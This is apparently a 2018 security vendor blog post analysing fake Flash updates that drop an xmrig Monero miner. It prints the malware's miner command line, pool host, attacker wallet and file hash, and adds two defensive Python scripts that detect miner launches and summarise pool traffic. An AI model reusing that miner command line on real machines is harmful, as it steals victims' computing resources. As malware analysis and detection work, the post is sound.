The Versa Networks Blog

Research Lab

Fake Flash Updates Mine Monero Under the Hood

By Versa Staff
Versa Networks
October 25, 2018

The recent surge in cryptomining is giving cyber criminals more attack vectors, at the expense of legitimate users. This year has seen a huge increase in the deployment of malware families that carry cryptominers as primary or secondary payloads. Miners are an easy payload for attackers to hide, and some campaigns now go a step further and disguise the miner as a Flash update. Palo Alto Networks reported a list of collected samples, some dating back to August 2018 [1]. The author further notes that the installers fetched from the Adobe website were legitimate, and that the malicious samples were mostly Windows binaries. There have been many previous attempts to pass off malware as Flash updates, but in this campaign some of the samples perform a legitimate Flash update while also dropping the Monero miner executable and running it without the user's knowledge.

On running the Flash update executable (SHA-256 a22b50d4f18b2fc92bdcffc01281c40cd4ed1d2bd9364fce91ea484a37bf3725), it shows the usual Windows warning, “Do you want to allow the following program from an unknown publisher to make changes to this computer?”, which most users dismiss. When the user accepts, it executes and drops two files, %appdata%\Roaming\xbooster\Manager.exe and %appdata%\Roaming\xbooster\xmrig.exe, and then runs xmrig.exe. Task Manager shows the xmrig.exe process running at above 90% CPU utilization.

Looking at the processes created when xmrig.exe executes, the process is started with the command line “C:\Users\<USER>\AppData\Roaming\xbooster\xmrig.exe -o stratum+tcp://xmr-eu1.nanopool.org:14444 -u 4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRzL9pCSYqvM4EaC4kh/2 -p x --donate-level=1 -B --max-cpu-usage=90 -t 1”.

The executable extracts resources into the temp folder and writes them out as xmrig.exe and Manager.exe. xmrig.exe then establishes a connection with the mining pool and keeps running in the background.
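The command line above is the most reliable host-side artifact in this campaign: the dropped file names and paths can change between samples, but a miner still has to be told which pool to contact and which wallet to credit. The following Python script is an added example, not code from the original post or from Versa; it parses process-creation log lines (a constructed sample, modelled on what an EDR or Sysmon Event ID 1 export provides) and flags any command line that points a process at a stratum pool, extracting the pool host and port, wallet, donation level and CPU cap as detection context. The flag spellings handled (`-o`/`--url`, `-u`/`--user`, `-p`/`--pass`, `-t`/`--threads`, `-B`/`--background`, `--donate-level`, `--max-cpu-usage`) are the ones seen on the page plus xmrig's long forms of the same options; the benign log entries and the user name `alice` are constructed.

```python
import re
import shlex
from typing import Dict, List, Optional, Tuple

# Constructed process-creation log, one command line per entry. The second
# entry reproduces the xmrig command line observed in the analysis above; the
# other entries are benign noise added to show the parser ignoring them.
SAMPLE_PROCESS_LOG = [
    r'C:\Windows\System32\svchost.exe -k netsvcs',
    r'C:\Users\alice\AppData\Roaming\xbooster\xmrig.exe -o stratum+tcp://xmr-eu1.nanopool.org:14444 '
    r'-u 4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRzL9pCSYqvM4EaC4kh/2 '
    r'-p x --donate-level=1 -B --max-cpu-usage=90 -t 1',
    r'"C:\Program Files\Mozilla Firefox\firefox.exe" -url https://example.test/',
]

# Pool URL in the form the miner expects: stratum+tcp://host:port (ssl/tls variants too).
POOL_URL_RE = re.compile(
    r'^stratum\+(?:tcp|ssl|tls)://(?P<host>[^:/\s]+)(?::(?P<port>\d+))?$', re.IGNORECASE)

# Short and long spellings of the options we extract; the value is either the
# next token ("-o URL") or attached with '=' ("--donate-level=1").
FLAG_KEYS = {
    "-o": "pool_url", "--url": "pool_url",
    "-u": "wallet", "--user": "wallet",
    "-p": "password", "--pass": "password",
    "-t": "threads", "--threads": "threads",
    "--donate-level": "donate_level",
    "--max-cpu-usage": "max_cpu_usage",
}
INT_KEYS = {"threads", "donate_level", "max_cpu_usage"}


def parse_miner_cmdline(cmdline: str) -> Optional[Dict]:
    """Return the miner configuration if this command line targets a stratum
    pool, else None. Detection keys on the pool URL scheme rather than on the
    image name, so a renamed xmrig.exe is still caught."""
    try:
        tokens = shlex.split(cmdline, posix=False)  # keep Windows backslashes intact
    except ValueError:  # unbalanced quotes in a mangled log line
        return None
    if not tokens:
        return None
    info: Dict = {"image": tokens[0].strip('"'), "background": False}
    i = 1
    while i < len(tokens):
        key, _, inline_val = tokens[i].partition("=")
        if key in ("-B", "--background"):
            info["background"] = True
        elif key in FLAG_KEYS:
            name = FLAG_KEYS[key]
            if inline_val:
                val = inline_val
            else:
                i += 1
                val = tokens[i] if i < len(tokens) else ""
            info[name] = int(val) if name in INT_KEYS and val.isdigit() else val
        i += 1
    m = POOL_URL_RE.match(info.get("pool_url", ""))
    if not m:
        return None  # no stratum pool on the command line: not a miner launch
    info["pool_host"] = m.group("host")
    info["pool_port"] = int(m.group("port")) if m.group("port") else None
    return info


def scan_process_log(lines: List[str]) -> List[Tuple[int, Dict]]:
    """Run the parser over every logged command line and return (index, finding) hits."""
    hits = []
    for idx, line in enumerate(lines):
        found = parse_miner_cmdline(line)
        if found:
            hits.append((idx, found))
    return hits


if __name__ == "__main__":
    for idx, f in scan_process_log(SAMPLE_PROCESS_LOG):
        print(f"entry {idx}: {f['image']} -> {f['pool_host']}:{f['pool_port']} "
              f"wallet={f['wallet'][:12]}... cpu_cap={f.get('max_cpu_usage')}%")
```

The wallet string and pool host extracted this way are the values worth pivoting on across an estate: every host whose process log yields the same wallet is part of the same campaign, whatever the dropper was named.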

The packet capture of the execution shows the executable doing DNS queries for “ztracker.xyz” and “xmr-eu1.nanopool.org”. The pool domain resolves to a number of IP addresses, of which the system establishes a TCP connection with 5.196.23.240 on port 14444. All further traffic recorded from xmrig.exe goes only to port 14444.

Following the TCP stream of the connection shows the miner logging in to the pool with the login parameter “4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRzL9pCSYqvM4EaC4kh”, which identifies the cryptowallet in which the mined coins will be collected. Going by the JSON message format documented for the xmrig executable [2], the first exchange is a login request to the mining pool and the second JSON exchange is the success reply to that login. The last exchange contains “method : job”, which indicates a new job being sent to the miner. The executable also contains placeholder strings for the submit request and for the reply to keepalive requests. The submit request will presumably be sent once the miner solves the challenge, to communicate the resulting hash for verification and to collect the mined coins.
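Because the pool traffic is plain newline-delimited JSON-RPC, the stream described above can be summarized mechanically once it has been reassembled. The Python below is an added example, not code from the original post or from Versa: it walks a constructed reassembly of the miner-to-pool stream (the wallet is the one seen in the analysis; the session id, blobs, job ids, nonce, share hash and agent string are placeholders), pairs each pool reply with the client request carrying the same `id`, and reports the wallet, whether the login succeeded, and how many jobs, share submissions and keepalives were observed. The field names (`login`, `pass`, `agent`, `job`, `submit`, `keepalived`, `status`) follow the xmrig-proxy STRATUM document cited as [2] as this author reads it; treat them as an assumption and check them against the document before relying on the exact keys.

```python
import json
from typing import Dict, List

# Constructed reassembly of the miner <-> pool TCP stream, one JSON object per
# line. '>' marks client->pool, '<' marks pool->client. Only the wallet comes
# from the capture described above; everything else is a placeholder.
CAPTURED_STREAM = "\n".join([
    '> {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRzL9pCSYqvM4EaC4kh/2","pass":"x","agent":"XMRig/PLACEHOLDER"}}',
    '< {"id":1,"jsonrpc":"2.0","error":null,"result":{"id":"sess-PLACEHOLDER","job":{"blob":"0707PLACEHOLDER","job_id":"job-1","target":"b88d0600"},"status":"OK"}}',
    '< {"jsonrpc":"2.0","method":"job","params":{"blob":"0707PLACEHOLDER","job_id":"job-2","target":"b88d0600"}}',
    '> {"id":2,"jsonrpc":"2.0","method":"submit","params":{"id":"sess-PLACEHOLDER","job_id":"job-2","nonce":"deadbeef","result":"00PLACEHOLDER"}}',
    '< {"id":2,"jsonrpc":"2.0","error":null,"result":{"status":"OK"}}',
    '> {"id":3,"jsonrpc":"2.0","method":"keepalived","params":{"id":"sess-PLACEHOLDER"}}',
    '< {"id":3,"jsonrpc":"2.0","error":null,"result":{"status":"KEEPALIVED"}}',
])


def parse_stream(stream_text: str) -> List[Dict]:
    """Split the reassembled stream into {dir, msg} records, skipping lines
    that are not valid JSON (a truncated segment must not abort the analysis)."""
    records = []
    for raw in stream_text.splitlines():
        raw = raw.strip()
        if not raw or raw[0] not in "<>":
            continue
        direction = "client" if raw[0] == ">" else "pool"
        try:
            obj = json.loads(raw[1:].strip())
        except json.JSONDecodeError:
            continue
        records.append({"dir": direction, "msg": obj})
    return records


def classify(record: Dict) -> str:
    """Label a message as '<dir>:<method>' for requests/notifications and
    '<dir>:reply-ok' or '<dir>:reply-error' for JSON-RPC replies."""
    msg = record["msg"]
    if msg.get("method"):
        return f"{record['dir']}:{msg['method']}"
    if "result" in msg or "error" in msg:
        status = "reply-ok" if msg.get("error") is None else "reply-error"
        return f"{record['dir']}:{status}"
    return f"{record['dir']}:unknown"


def summarize_stratum_stream(stream_text: str) -> Dict:
    """Reduce the stream to the facts an analyst wants: which wallet is being
    credited, whether the pool accepted the login, and the amount of work seen."""
    summary: Dict = {"login": None, "agent": None, "login_ok": False,
                     "jobs": 0, "shares_submitted": 0, "keepalives": 0, "sequence": []}
    pending: Dict = {}  # request id -> method, to pair each reply with its request
    for rec in parse_stream(stream_text):
        msg, kind = rec["msg"], classify(rec)
        summary["sequence"].append(kind)
        params = msg.get("params") or {}
        if kind == "client:login":
            summary["login"] = params.get("login")
            summary["agent"] = params.get("agent")
        elif kind == "client:submit":
            summary["shares_submitted"] += 1
        elif kind == "client:keepalived":
            summary["keepalives"] += 1
        elif kind == "pool:job":
            summary["jobs"] += 1
        if rec["dir"] == "client" and "id" in msg:
            pending[msg["id"]] = msg.get("method")
        elif rec["dir"] == "pool" and "id" in msg:
            result = msg.get("result") or {}
            if pending.pop(msg["id"], None) == "login" and result.get("status") == "OK":
                summary["login_ok"] = True
                if "job" in result:  # the login reply already carries the first job
                    summary["jobs"] += 1
    return summary


if __name__ == "__main__":
    print(json.dumps(summarize_stratum_stream(CAPTURED_STREAM), indent=2))
```

Pairing replies with requests by `id` matters in practice: the same `{"status":"OK"}` reply shape answers both a login and a share submission, so only the request that carried that `id` tells you which one succeeded.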

Cryptominers installed on a system without the user's knowledge are usually noticed only through slow system performance, and many end users will not be able to pinpoint the cause immediately. Campaigns such as this one, which plant miners alongside legitimate updates, need to be monitored and prevented: even if not openly destructive, they still degrade system performance. The Versa VOS™ (formerly FlexVNF) antivirus module detects malicious executables and prevents them from being downloaded onto the system.

References

[1] https://researchcenter.paloaltonetworks.com/2018/10/unit42-fake-flash-updaters-push-cryptocurrency-miners/

[2] https://github.com/xmrig/xmrig-proxy/blob/master/doc/STRATUM.md
